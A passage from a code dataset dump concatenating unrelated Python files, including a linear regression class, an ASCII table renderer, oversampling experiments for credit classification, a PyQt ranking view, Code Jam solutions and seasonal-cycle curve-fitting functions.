self._ds[PR].sum(axis=1)\n\n        # Issues + gists + projects = D\n        issues = ['issues','gists','projects']\n        self.dataframe['D'] = self._ds[issues].sum(axis=1)\n\n        # A lang numbers + C langs numbers = E\n        lang_AC_num = ['AlanguageInfocount', 'ClanguageInfocount']\n        self.dataframe['E'] = self._ds[lang_AC_num].sum(axis=1)\n\n        # A lang size + C lang size = F\n        lang_AC_size = ['AlanguageInfosize', 'ClanguageInfosize']\n        self.dataframe['F'] = self._ds[lang_AC_size].sum(axis=1)\n\n        # B lang numbers + D langs numbers = G\n        lang_BD_num = ['BlanguageInfocount', 'DlanguageInfocount']\n        self.dataframe['G'] = self._ds[lang_BD_num].sum(axis=1)\n\n        # B lang size + D lang size = H\n        lang_BD_size = ['BlanguageInfosize', 'DlanguageInfosize']\n        self.dataframe['H'] = self._ds[lang_BD_size].sum(axis=1)\n\n        # A + B + C + D count = I\n        ABCD_count = ['repoACount', 'repoBCount', 'repoCCount', 'repoDCount']\n        self.dataframe['I'] = self._ds[ABCD_count].sum(axis=1)\n\n        # A fork,star,watch + C fork,star,watch = J\n        AC_fsw = ['forkACount', 'stargazerACount', 'Awatchers',\n                  'forkCCount', 'stargazerCCount', 'Cwatchers']\n        self.dataframe['J'] = self._ds[AC_fsw].sum(axis=1)\n\n        # B fork,star,watch + D fork,star,watch = K\n        BD_fsw = ['forkBCount', 'stargazerBCount', 'Bwatchers',\n                  'forkDCount', 'stargazerDCount', 'Dwatchers']\n        self.dataframe['K'] = self._ds[BD_fsw].sum(axis=1)\n\n        # A size + C size = L\n        AC_size = ['repoASize', 'repoCSize']\n        self.dataframe['L'] = self._ds[AC_size].sum(axis=1)\n\n        # B size + D size = M\n        BD_size = ['repoBSize', 'repoDSize']\n        self.dataframe['M'] = self._ds[BD_size].sum(axis=1)\n\n        
\n","repo_name":"anguyen216/pyqt_UI","sub_path":"app/data/construct_metrics.py","file_name":"construct_metrics.py","file_ext":"py","file_size_in_byte":4193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14698347138","text":"import numpy as np\r\n\r\n\r\nclass LinearRegression:\r\n def __init__(self, history=True):\r\n self.history = history\r\n\r\n def fit(self, X, y, alpha=0.01, iterations=1000):\r\n # Add column 1 to X\r\n X = np.array([[x for x in X[i]]+[1] for i in range(X.shape[0])])\r\n # Init theta to 0\r\n theta = np.zeros((X.shape[1],1))\r\n J_history = []\r\n\r\n # Start gradient descent \r\n for iter in range(iterations):\r\n delta = self.calculGradient(X, y, theta)\r\n theta = theta - alpha*delta\r\n if self.history:\r\n J_history.append(self.calculCost(X, y, theta))\r\n self.theta = theta\r\n return J_history\r\n \r\n def predict(self, X):\r\n # Add column 1 to X\r\n X = np.array([[x for x in X[i]]+[1] for i in range(X.shape[0])])\r\n return np.dot(X,self.theta).reshape(X.shape[0])\r\n\r\n\r\n def calculGradient(self, X, y, theta):\r\n m = len(y)\r\n predictions = np.dot(X,theta).reshape(m)\r\n# delta = [sum([(predictions[i] - y[i])*X[i,xi] for i in range(m)])/m for xi in range(X.shape[1])]\r\n delta = np.dot((predictions - y), X)\r\n delta = np.array(delta).reshape(theta.shape)\r\n return delta\r\n\r\n def calculCost(self, X, y, theta):\r\n m = len(y)\r\n predictions = np.dot(X,theta).reshape(m)\r\n sqrErrors = np.square(predictions - y)\r\n J = sum(sqrErrors)/(2*m)\r\n return J\r\n\r\n def getCoefficients(self):\r\n return self.theta\r\n","repo_name":"Prevost-Guillaume/ML-Algorithms","sub_path":"LinearRegression.py","file_name":"LinearRegression.py","file_ext":"py","file_size_in_byte":1517,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3069329185","text":"# python 3.5\nimport sys\nimport math\nfrom collections import OrderedDict\n\nMAX_TRIES = 100000\n\nclass Cell:\n def __init__(self, text, padding=0):\n self.text = str(text)\n self.padding = padding\n self.lines = [\" \"*self.padding + self.text + \" \"*self.padding]\n self.total_chars = len(self.text) + 2*self.padding\n self.depth = len(self.lines)\n\n def get_depth(self):\n return self.depth\n\n def get_line(self, index):\n try:\n return self.lines[index]\n except:\n return \"\"\n\n def get_width(self):\n return len(self.lines[0])\n\n def remove_depth(self):\n self.depth -= 1\n max_chars_per_line = math.ceil(self.total_chars / self.depth)\n for index,_ in enumerate(self.lines):\n self.lines[index] = \" \"*self.padding + self.text[index*max_chars_per_line: (index+1)*max_chars_per_line] + \" \"*self.padding\n self.lines = self.lines[:-1]\n return self.depth\n\n def add_depth(self):\n self.depth += 1\n self.lines.append(None)\n # does not include padding as a char in a line here\n max_chars_per_line = math.ceil(self.total_chars / self.depth)\n for index,_ in enumerate(self.lines):\n self.lines[index] = \" \"*self.padding + self.text[index*max_chars_per_line: (index+1)*max_chars_per_line] + \" \"*self.padding\n return self.depth\n\nclass Column(Cell):\n def __init__(self, text, padding=0):\n super().__init__(text, padding=padding)\n self.daughter_cells = []\n self._index = 0\n\n def add_cell(self, text):\n self.daughter_cells.append(Cell(text))\n\n def add_depth(self):\n # super().add_depth()\n for c in self.daughter_cells: \n c.add_depth()\n\n def add_my_depth(self):\n return 
super().add_depth()\n\n def get_depth(self):\n # returns the column's deepest depth value\n col_depth = super().get_depth()\n for c in self.daughter_cells:\n col_depth = max(col_depth, c.get_depth())\n return col_depth\n\n def get_width(self):\n # returns the colum's largest width value\n max_width = super().get_width()\n for c in self.daughter_cells:\n max_width = max(max_width, c.get_width())\n return max_width\n\n def get_my_width(self):\n return super().get_width()\n\n def get_total_daughters(self):\n return len(self.daughter_cells)\n\n def get_cell(self, index):\n try:\n return self.daughter_cells[index]\n except:\n return Cell(\"\")\n\nclass Table():\n '''\n data = {\n key1: [data1, data2, data3],\n key2: [data4, data5, data6]\n }\n\n key1 key2\n\n data1 data4\n data2 data5\n data3 data6\n\n '''\n\n def __init__(self, data, max_total_width=162, padding=0, fast_mode=False):\n self.columns = []\n self.fast_mode = fast_mode\n # populate columns\n # then add them to the table\n for key, value in data.items():\n col = Column(key, padding=padding)\n for datax in value:\n col.add_cell(datax)\n self.columns.append(col)\n\n # adjust sizing\n tries = 0\n current_total_width = 1000000001 # a billione\n\n # fast mode\n # assume all data is similar, and use the 0th\n # row as a model to assume the rest of the tbale\n min_table_width = 2*(len(self.columns)) + 1\n if max_total_width < min_table_width:\n print(\"ERROR: minimum table width for this dataset is %d. Will generate this size instead.\" % (min_table_width))\n max_total_width = min_table_width\n\n if self.fast_mode:\n while current_total_width > max_total_width:\n tries += 1\n max_cell_value = 0 # starts at 0 grows to max width\n max_col_index = 0 # i\n max_cell_index = -1 # -1 or 0\n\n for i, col in enumerate(self.columns):\n header_title_width = col.get_my_width()\n row_0_cell_width = col.daughter_cells[0].get_width()\n\n if header_title_width > max_cell_value:\n max_cell_index = -1\n max_col_index = i\n max_cell_value = header_title_width\n\n if row_0_cell_width > max_cell_value:\n max_cell_index = 0\n max_col_index = i\n max_cell_value = row_0_cell_width\n\n if max_cell_index == -1:\n # add depth to just the title\n self.columns[max_col_index].add_my_depth()\n else:\n # add depth to everything\n self.columns[max_col_index].add_depth()\n\n current_total_width = self.get_current_width()\n if tries >= MAX_TRIES:\n print(\"ERROR: Could not make table to desired width. Attempts tried: %d\" % (tries))\n break\n\n else:\n # comprehensive mode\n # find largest cell, shrink it\n while current_total_width > max_total_width:\n cells_to_update = [] # list of tuples: col index, cell index. 
-1 cell index == the column header itself\n tries += 1\n # find column with largest entry stored at max_index\n # that has \n max_cell_width = 0\n\n for i, col in enumerate(self.columns):\n col_my_width = col.get_my_width()\n\n if col_my_width > max_cell_width:\n cells_to_update = [(i, -1)]\n max_cell_width = col_my_width\n\n elif col_my_width == max_cell_width:\n cells_to_update.append((i, -1))\n\n for j, cell in enumerate(col.daughter_cells):\n cell_width = cell.get_width()\n\n if cell_width > max_cell_width:\n cells_to_update = [(i, j)]\n max_cell_width = cell_width\n\n elif cell_width == max_cell_width:\n cells_to_update.append((i, j))\n \n\n for col_index, cell_index in cells_to_update:\n if cell_index == -1:\n self.columns[col_index].add_my_depth()\n else:\n d = self.columns[col_index].get_cell(cell_index).add_depth()\n\n current_total_width = self.get_current_width()\n if tries >= MAX_TRIES:\n print(\"ERROR: Could not make table to desired width. Attempts tried: %d\" % (tries))\n break\n \n\n def get_current_width(self):\n borders = len(self.columns) + 1\n tally = 0\n for col in self.columns:\n tally += col.get_width()\n return borders + tally\n\n\n def show(self):\n # DEFINE CONSTANTS\n TOP_LEFT = '\\u250C'\n TOP_RIGHT = '\\u2510'\n BOTTOM_LEFT = '\\u2514'\n BOTTOM_RIGHT = '\\u2518'\n HORIZONTAL = '\\u2500'\n VERTICAL = '\\u2502'\n CROSS = '\\u253C'\n\n TOP_PROTRUDE = '\\u252C' #(T)\n LEFT_PROTRUDE = '\\u251C'\n RIGHT_PROTRUDE = '\\u2524'\n BOTTOM_PROTRUDE = '\\u2534'\n\n # print top line \n print(TOP_LEFT, end='')\n for index, col in enumerate(self.columns):\n print(HORIZONTAL * col.get_width(), end='')\n if index + 1 == len(self.columns):\n print(TOP_RIGHT)\n else:\n print(TOP_PROTRUDE, end='')\n\n # max depth of the keys\n MAX_DEPTH = 0\n for col in self.columns:\n MAX_DEPTH = max(col.depth, MAX_DEPTH)\n\n # print the keys\n for index in range(MAX_DEPTH):\n for col in self.columns:\n print(\"{2}{1:^{0}}\".format(col.get_width(), col.get_line(index), VERTICAL) , end=\"\")\n print(VERTICAL)\n \n # print bottom of keys\n print(LEFT_PROTRUDE, end='')\n for index, col in enumerate(self.columns):\n print(HORIZONTAL * col.get_width(), end='')\n if index + 1 == len(self.columns):\n print(RIGHT_PROTRUDE)\n else:\n print(CROSS, end='')\n\n # loop over each row of each column now, printing out each line of each cell\n MAX_DAUGHTERS = 0\n for col in self.columns:\n MAX_DAUGHTERS = max(MAX_DAUGHTERS, col.get_total_daughters())\n\n for row in range(MAX_DAUGHTERS):\n # get maximum depth for row 1\n MAX_DEPTH = 0\n for col in self.columns:\n MAX_DEPTH = max(MAX_DEPTH, col.get_cell(row).get_depth())\n\n # print row \"row\"\n for depth in range(MAX_DEPTH):\n for col in self.columns:\n print(\"{2}{1:^{0}}\".format(col.get_width(), col.get_cell(row).get_line(depth), VERTICAL) , end=\"\")\n print(VERTICAL)\n\n # line\n if row + 1 == MAX_DAUGHTERS:\n print(BOTTOM_LEFT, end='')\n else:\n print(LEFT_PROTRUDE, end='')\n for _index, _col in enumerate(self.columns):\n print(HORIZONTAL * _col.get_width(), end='')\n if _index + 1 == len(self.columns):\n if row + 1 == MAX_DAUGHTERS:\n print(BOTTOM_RIGHT)\n else:\n print(RIGHT_PROTRUDE)\n else:\n if row + 1 == MAX_DAUGHTERS:\n print(BOTTOM_PROTRUDE, end='')\n else:\n print(CROSS, end='')\n\n def show_csv(self):\n # print headers\n headers = []\n for col in self.columns:\n headers.append(col.text)\n print(\",\".join(headers))\n\n # print everything else\n MAX_DAUGHTERS = 0\n for col in self.columns:\n MAX_DAUGHTERS = max(MAX_DAUGHTERS, 
col.get_total_daughters())\n\n for row in range(MAX_DAUGHTERS):\n this_row = []\n for col in self.columns:\n try: \n this_row.append(col.get_cell(row).text)\n except:\n this_row.append('')\n print(\",\".join(this_row))\n\n def show_json(self):\n items = []\n MAX_DAUGHTERS = 0\n for col in self.columns:\n MAX_DAUGHTERS = max(MAX_DAUGHTERS, col.get_total_daughters())\n\n \"\"\"\n {\n items:[\n {\"apple\" : value, \"orange\": value1, ...}, # an item in items\n {\"apple\" : value2, \"orange\":value3, ...},... # order is broken\n ]\n }\n\n \"\"\"\n\n for i in range(MAX_DAUGHTERS):\n item = {} # OrderedDict({}) is an alternative. This leaves OrderedDicts in the json output, which looks funny. Plus json doesn't need to be ordered anyways\n for col in self.columns:\n try:\n item[col.text] = col.daughter_cells[i].text\n except:\n item[col.text] = \"\"\n items.append(item)\n print({\"items\":items})\n\n\"\"\"\nif __name__ == \"__main__\":\n # example input\n data = OrderedDict([('apple', [40,50,60,70]), ('banana', [3,1,2]), ('orange', [200]), ('pear', [8,8,90,7])])\n t = Table(data, max_total_width=int(sys.argv[1]), fast_mode=False)\n t.show()\n t.show_csv()\n t.show_json()\"\"\"\n","repo_name":"logdog/asciiTable","sub_path":"table.py","file_name":"table.py","file_ext":"py","file_size_in_byte":11592,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23545555511","text":"#!/usr/bin/env python3\n\nfor case_num in range(int(input())):\n # O(2^n) :(\n line = input().split()\n pancakes = [c == '+' for c in line[0]]\n flip_size = int(line[1])\n possible_flips = len(pancakes) + 1 - flip_size\n for i in range(2 ** possible_flips):\n bits = [(i >> j) & 1 for j in range(possible_flips)]\n new_pancakes = pancakes[:]\n for j in range(possible_flips):\n if bits[j]:\n for k in range(flip_size):\n new_pancakes[j + k] = not new_pancakes[j + k]\n if all(new_pancakes):\n print('Case #%d: %d' % (case_num + 1, bits.count(True)))\n break\n else:\n print('Case #%d: IMPOSSIBLE' % (case_num + 1,))\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_199/3145.py","file_name":"3145.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18377253134","text":"# -*- coding: utf-8 -*\nfrom sklearn.preprocessing import StandardScaler\nfrom model.load_data import load_data, split_test_data\nfrom sklearn import tree\nfrom sklearn.metrics import roc_auc_score, classification_report, accuracy_score\nfrom imblearn.over_sampling import RandomOverSampler, SMOTE, ADASYN\n\n\n'''\nOSIBD\n(1)准备多数类子集和少数类子集\n(2)去噪声和边界实例来改善类不平衡\n(3)少数类上过采样\n(4)形成平衡的数据集,应用C4.5\n'''\n\n\ndef get_maj_min_data(df=None):\n majroity = df[df.binaryCategory == 1]\n minroity = df[df.binaryCategory == -1]\n X_majroity = majroity.ix[:, 0:-1]\n X_minroity = minroity.ix[:, 0:-1]\n y_majority = majroity.ix[:, -1]\n y_minroity = minroity.ix[:, -1]\n return X_majroity, X_minroity, y_majority, y_minroity\n\n\ndef osibd(X_train, X_test, y_train, y_test):\n clf = tree.DecisionTreeClassifier(random_state=1995)\n clf.fit(X_train, y_train)\n y_pred_test = clf.predict(X_test)\n # 未过采样 0.5130139073499438\n # 随机过采样 0.5265026969279092\n # SMOTE 0.5022771818200142\n # SMOTE-Borderline1 0.5138753354115113\n # ADASYN 0.5120060424465268\n # print('ROC_AUC_SCORE:', roc_auc_score(y_test, y_pred_test))\n print('classification_report:\\n', classification_report(y_test, y_pred_test))\n 
print('accuracy_score:', accuracy_score(y_test, y_pred_test))\n\n\ndef randomOverSampler(X_train, y_train):\n ros = RandomOverSampler(random_state=1995)\n X_resampled, y_resampled = ros.fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('majroity_size:', majroity_size.shape)\n print('minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\ndef smote(X_train, y_train):\n X_resampled, y_resampled = SMOTE(random_state=1995).fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('majroity_size:', majroity_size.shape)\n print('minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\ndef smoteBorderline1(X_train, y_train):\n X_resampled, y_resampled = SMOTE(kind='borderline1', random_state=1995).fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('majroity_size:', majroity_size.shape)\n print('minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\ndef adasyn(X_train, y_train):\n X_resampled, y_resampled = ADASYN(random_state=1995).fit_sample(X_train, y_train)\n majroity_size = y_resampled[y_resampled == 1]\n minroity_size = y_resampled[y_resampled == -1]\n print('过采样后majroity_size:', majroity_size.shape)\n print('过采样后minroity_size:', minroity_size.shape)\n return X_resampled, y_resampled\n\n\nif __name__ == '__main__':\n allData = load_data()\n X_majroity, X_minroity, y_majority, y_minroity = get_maj_min_data(allData)\n print('未过采样时majroity_size:', y_majority.shape[0])\n print('未过采样时minroity_size:', y_minroity.shape[0])\n X_train, X_test, y_train, y_test = split_test_data(allData)\n\n # 过采样方法\n X_resampled, y_resampled = randomOverSampler(X_train, y_train)\n\n # 预处理\n # ss = StandardScaler()\n # X_resampled = ss.fit_transform(X_resampled)\n # X_test = ss.transform(X_test)\n osibd(X_resampled, X_test, y_resampled, y_test)\n\n","repo_name":"wittonzhou/Credit","sub_path":"model/OSIBD.py","file_name":"OSIBD.py","file_ext":"py","file_size_in_byte":3485,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"29403466168","text":"import json\n\nfrom PySide6 import QtWidgets\n\nfrom interface.ui_rank import Ui_Rank\nfrom qt_owner import QtOwner\nfrom server import req, Log, Status\nfrom task.qt_task import QtTaskBase\nfrom tools.str import Str\n\n\nclass RankView(QtWidgets.QWidget, Ui_Rank, QtTaskBase):\n def __init__(self):\n super(self.__class__, self).__init__()\n Ui_Rank.__init__(self)\n QtTaskBase.__init__(self)\n\n self.isInitKind = False\n self.setupUi(self)\n\n self.isInit = False\n self.tabWidget.setCurrentIndex(0)\n self.tabWidget.currentChanged.connect(self.SwitchPage)\n\n def SwitchCurrent(self, **kwargs):\n self.Init()\n pass\n\n def SwitchPage(self, index):\n if index == 0 and self.h24BookList.count() <= 0:\n self.AddHttpTask(req.RankReq(\"H24\"), self.InitBack, backParam=\"H24\")\n elif index == 1 and self.d7BookList.count() <= 0:\n self.AddHttpTask(req.RankReq(\"D7\"), self.InitBack, backParam=\"D7\")\n elif index == 2 and self.d30BookList.count() <= 0:\n self.AddHttpTask(req.RankReq(\"D30\"), self.InitBack, backParam=\"D30\")\n elif index == 3 and not self.isInitKind:\n QtOwner().ShowLoading()\n self.AddHttpTask(req.KnightRankReq(), self.InitKindBack)\n return\n\n def Init(self):\n if self.isInit:\n return\n self.isInit = True\n 
QtOwner().ShowLoading()\n self.AddHttpTask(req.RankReq(\"H24\"), self.InitBack, backParam=\"H24\")\n # self.AddHttpTask(req.RankReq(\"D7\"), self.InitBack, backParam=\"D7\")\n # self.AddHttpTask(req.RankReq(\"D30\"), self.InitBack, backParam=\"D30\")\n\n def InitBack(self, raw, backParam):\n QtOwner().CloseLoading()\n try:\n if backParam == \"H24\":\n bookList = self.h24BookList\n elif backParam == \"D7\":\n bookList = self.d7BookList\n elif backParam == \"D30\":\n bookList = self.d30BookList\n else:\n assert False\n\n st = raw[\"st\"]\n if st == Status.Ok:\n data = json.loads(raw[\"data\"])\n for v in data.get(\"data\").get(\"comics\"):\n bookList.AddBookByDict(v)\n else:\n QtOwner().ShowError(Str.GetStr(st))\n except Exception as es:\n Log.Error(es)\n self.isInit = False\n\n def InitKindBack(self, raw):\n QtOwner().CloseLoading()\n try:\n data = json.loads(raw[\"data\"])\n if data.get(\"code\") == 200:\n self.isInitKind = True\n for index, v in enumerate(data.get(\"data\").get(\"users\")):\n self.kindList.AddUserKindItem(v, index+1)\n else:\n QtOwner().ShowError(raw[\"st\"])\n except Exception as es:\n Log.Error(es)\n self.isInit = False\n","repo_name":"tonquer/picacg-qt","sub_path":"src/view/category/rank_view.py","file_name":"rank_view.py","file_ext":"py","file_size_in_byte":2880,"program_lang":"python","lang":"en","doc_type":"code","stars":2823,"dataset":"github-code","pt":"61"} +{"seq_id":"23474644421","text":"#!/usr/bin/env python3\n\ndef int2dir(x):\n if x == '^':\n return 0\n if x == '>':\n return 1\n if x == 'v':\n return 2\n if x == '<':\n return 3\n\ndirs = ((-1, 0), (0, 1), (1, 0), (0, -1))\n\ndef move(p1, p2):\n return (p1[0] + p2[0], p1[1] + p2[1])\n\ndef is_in(p, r, c):\n return (0 <= p[0] and p[0] < r and 0 <= p[1] and p[1] < c)\n\ndef calcdir(arr, r, c):\n newarr = {}\n for a in arrows:\n newarr[a] = [arr[a], [None for d in range(4)]]\n for d in range(4):\n pos = move(a, dirs[d])\n while is_in(pos, r, c) and pos not in arr:\n pos = move(pos, dirs[d])\n if is_in(pos, r, c):\n newarr[a][1][d] = pos\n return newarr\n\n\ndef test(arr):\n for a in arr:\n if arr[a][1][arr[a][0]] is None:\n return False\n return True\n\ndef popr(arr):\n ret = 0\n for a in arr:\n opts = arr[a][1]\n if opts[arr[a][0]] == None:\n for i in range(4):\n if opts[i] is not None:\n arr[a][0] = i\n ret += 1\n break\n if opts[arr[a][0]] == None:\n return None\n return ret\n\n\nT = int(input())\n\nfor t in range(1, T + 1):\n r, c = (int(x) for x in input().split())\n\n arrows = {}\n\n for i in range(r):\n row = input()\n for j, char in enumerate(row):\n if char != '.':\n arrows[(i,j)] = int2dir(char)\n\n arrows = calcdir(arrows, r, c)\n ret = popr(arrows)\n print(\"Case #{}: {}\".format(t, 'IMPOSSIBLE' if ret == None else ret))\n\n\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_168/116.py","file_name":"116.py","file_ext":"py","file_size_in_byte":1597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73813293635","text":"from queues import Queue\n\n\nclass TestCases:\n def test_enqueue(self):\n \"\"\"Inserts item at the back of the queue\"\"\"\n queue = Queue()\n\n queue.enqueue(\"foo\")\n queue.enqueue(\"bar\")\n queue.enqueue(\"baz\")\n\n assert queue.items.length == 3\n assert queue.items.tail.value == \"foo\"\n\n def test_dequeue(self, queue):\n \"\"\"Returns and removes item at the front of the queue\"\"\"\n assert queue.items.tail.value == \"foo\"\n dequeued = queue.dequeue()\n assert dequeued == 
\"foo\"\n","repo_name":"max-allen/algorithms_workbook","sub_path":"queues/tests/test_queue_construction.py","file_name":"test_queue_construction.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"41856840060","text":"import numpy as np\nimport xarray as xr\n\n\ndef fit_seasonal_cycle_harmonic(da, target_time=12, dim=\"time\", window_years=3):\n \"\"\"fits a seasonal cycle harmonic to data\n\n Parameters\n ----------\n da : xr.DataArray\n a 1D dataset with time as the dimension\n dim : str\n time dimension\n target_time : pd.DatetimeIndex, float\n can be either a float or a pd.DatetimeIndex. if a float,\n it represents the size of the time step as a fraction of a\n year. If it's a pd.DatetimeIndex, then the new output will\n be interpolated onto that new time stamp.\n\n Returns\n -------\n xr.DataArray\n A fitted output with time either as target_time as inputted,\n or if target_time is an integer, then as a datetime array\n centered roughly to the window width of the time step.\n \"\"\"\n from scipy.optimize import curve_fit\n from numpy import cos, sin, pi\n\n # from numba import njit\n from pandas import Series, DatetimeIndex\n\n # @njit\n def fit_seascycle_harmonic(x, a1, a2, a3, a4, a5, a6, a7):\n \"\"\"function to fit as defined by Peter\"\"\"\n return (\n a1\n + a2 * x\n + a3 * x**2\n + a4 * sin(2 * pi * x)\n + a5 * cos(2 * pi * x)\n + a6 * sin(4 * pi * x)\n + a7 * cos(4 * pi * x)\n )\n\n # decimal year\n decimal_year = da.time.dt.dayofyear / 366 + da.time.dt.year\n da_na = da.assign_coords(time=decimal_year).dropna(\"time\")\n\n y = da_na.data\n x = da_na.time.data\n\n t0 = x.min() // 1\n t1 = x.max() // 1\n\n if isinstance(target_time, DatetimeIndex):\n time_out = target_time.dayofyear / 366 + target_time.year\n elif isinstance(target_time, (int, float)):\n time_step = 1 / target_time\n time_out = np.arange(t0 + time_step / 2, t1, time_step)\n else:\n raise TypeError(\"target_time must be int or pd.DateTimeIndex\")\n\n fitted = {}\n for i0 in np.arange(t0, t1 + 1):\n i1 = i0 + window_years\n\n # mask limits x and y to window years\n wmask = (x > i0) & (x < i1)\n coefs = curve_fit(\n fit_seascycle_harmonic,\n x[wmask],\n y[wmask],\n p0=[300, 1.1, 0.01, -3, -7, 5.5, 5.5],\n )[0]\n\n # create estimates\n new_x = time_out[(time_out >= i0) & (time_out <= i1)].astype(float)\n new_y = fit_seascycle_harmonic(new_x, *coefs)\n\n new = {_decimal_year_to_datetime(k): v for k, v in zip(new_x, new_y)}\n\n # now the new data needs to be added to the specific time (k)\n for k in new:\n if k not in fitted:\n fitted[k] = [new[k]]\n else:\n fitted[k] += (new[k],)\n # for each key (time), take the average of the 3 or less points\n\n for k in fitted:\n fitted[k] = np.nanmean(fitted[k])\n # convert the fittedput to an xarray.dataarray\n fitted = Series(fitted).to_xarray().rename(index=\"time\")\n\n return fitted\n\n\ndef seascycl_fit_graven(da, n_years=3, dim=\"time\"):\n \"\"\"\n Fits a seasonal cycle to data using cos and sin functions.\n\n Using the approach defined in Graven et al. (2013)\n\n Note\n ----\n This function is slow with large datasets - it is recommended to use\n `seascycl_fit_climatology` when the dataset is large. This function\n is suited to small datasets with sparse data.\n\n Parameters\n ----------\n da : xarray.DataArray\n The data to fit a seasonal cycle to. 
Time dimension must be a time index\n n_years : int\n The number of years to fit the seasonal cycle to (a rolling window)\n dim : str\n The name of the time dimension. Must be a time index\n\n Returns\n -------\n xarray.Dataset\n The fitted seasonal cycle and the difference between the JJA and DJF\n \"\"\"\n\n def get_months_from_time(time, months, tile=1):\n \"\"\"\n gets the index of the given months in the time array\n will only give index for first year unless tile > 1\n \"\"\"\n\n # get the unique years from the time array with counts\n years = time.dt.year.values\n unique, counts = np.unique(years, return_counts=True)\n\n # assert that all counts are the same\n msg = \"this function does not work for unevenly spaced time\"\n assert np.all(counts == counts[0]), msg\n n_steps = counts[0]\n\n year_month = time.dt.month.values[years == unique[0]]\n\n # get the months that are in the list\n bool_idx = np.isin(year_month, months)\n # get the indices of the months that are in the list\n loc_idx = np.where(bool_idx)[0]\n\n # tile the indicies so the fit the given tile\n idxs = [loc_idx + i * n_steps for i in range(tile)]\n idxs = np.concatenate(idxs)\n\n return idxs\n\n from numba import njit\n from numpy import sin, cos, pi\n\n stride = _get_number_of_time_steps_in_year(da[dim])\n window = n_years * stride\n\n assert stride == 12, \"this function only works for monthly data\"\n assert n_years % 2, \"n_years must be an odd number\"\n\n def fit_sc(x, a1, a2, a3, a4, a5, a6, a7):\n \"\"\"function to fit as defined by Peter\"\"\"\n return (\n a1\n + a2 * x\n + a3 * x**2\n + a4 * sin(2 * pi * x)\n + a5 * cos(2 * pi * x)\n + a6 * sin(4 * pi * x)\n + a7 * cos(4 * pi * x)\n )\n\n dims = list(da.dims)\n dims.remove(dim)\n\n windowed = (\n # we do not center since this shifts the months by 6\n da.rolling(**{dim: window}, center=False, min_periods=stride)\n .construct(**{dim: \"time_step\"}, stride=stride)\n .stack(other=dims)\n .where(lambda x: x.notnull().sum(\"time_step\") > stride, drop=True)\n .assign_coords(time_step=(np.arange(window) % stride + 1) / stride)\n )\n\n fast_func = njit()(fit_sc)\n coefs = windowed.curvefit(\n coords=\"time_step\",\n func=fast_func,\n p0=[300, 1.1, 0.01, -3, -7, 5.5, 5.5],\n kwargs={\"maxfev\": 100},\n )\n\n seas_cycle = (\n # multiply out coefficients\n fit_sc(windowed.time_step, *coefs.curvefit_coefficients.T)\n .drop(\"param\")\n .assign_coords(time_step=lambda x: x.time_step * stride)\n .groupby(\"time_step\")\n .mean()\n .unstack()\n )\n\n idx_jja = get_months_from_time(da.time, [6, 7, 8])\n idx_djf = get_months_from_time(da.time, [12, 1, 2])\n jja = seas_cycle.isel(time_step=idx_jja).mean(dim=\"time_step\")\n djf = seas_cycle.isel(time_step=idx_djf).mean(dim=\"time_step\")\n\n out = xr.Dataset()\n out[\"seas_cycle\"] = seas_cycle\n out[\"jja_minus_djf\"] = jja - djf\n\n return out\n\n\ndef seascycl_fit_climatology(da, n_years=3, dim=\"time\"):\n \"\"\"\n Fit a seasonal cycle to the climatology of a time series.\n\n Parameters\n ----------\n da : xarray.DataArray\n window : int\n The number of months in the window.\n stride : int\n The number of months to advance the window.\n dim : str\n The dimension to use for the window.\n\n Returns\n -------\n xarray.Dataset\n The seasonal cycle and the difference between the JJA and DJF\n \"\"\"\n\n stride = _get_number_of_time_steps_in_year(da[dim])\n assert stride == 12, \"this function only works for monthly data\"\n\n window = n_years * stride\n\n dims = list(da.dims)\n dims.remove(dim)\n seas_cycle = (\n # we do not 
center since this shifts the months by 6\n da.rolling(**{dim: window}, center=False, min_periods=stride)\n .construct(**{dim: \"month\"}, stride=stride)\n .assign_coords(month=np.arange(window) % 12 + 1)\n .groupby(\"month\")\n .mean()\n )\n\n mon_avg = lambda x, m: x.sel(month=m).mean(\"month\")\n out = xr.Dataset()\n out[\"seas_cycle\"] = seas_cycle\n out[\"jja_minus_djf\"] = mon_avg(seas_cycle, [6, 7, 8]) - mon_avg(\n seas_cycle, [12, 1, 2]\n )\n\n return out\n\n\ndef _get_number_of_time_steps_in_year(time, raise_if_uneven=True):\n \"\"\"\n Get the number of time steps in a year (e.g. months, days, etc.)\n \"\"\"\n # get the unique years from the time array with counts\n years = time.dt.year.values\n unique, counts = np.unique(years, return_counts=True)\n\n all_the_same = np.all(counts == counts[0])\n if not all_the_same and raise_if_uneven:\n raise ValueError(f\"time array is not evenly spaced: {time}\")\n else:\n return counts[0]\n\n\ndef _decimal_year_to_datetime(decimal_year):\n from datetime import datetime, timedelta\n from pandas import Timestamp\n\n t = decimal_year\n year = int(t)\n ndays_in_year = 365 if (year % 4) else 366\n day = int(np.around((t - year) * ndays_in_year)) - 1\n time = Timestamp(datetime(int(year), 1, 1) + timedelta(days=day))\n\n return 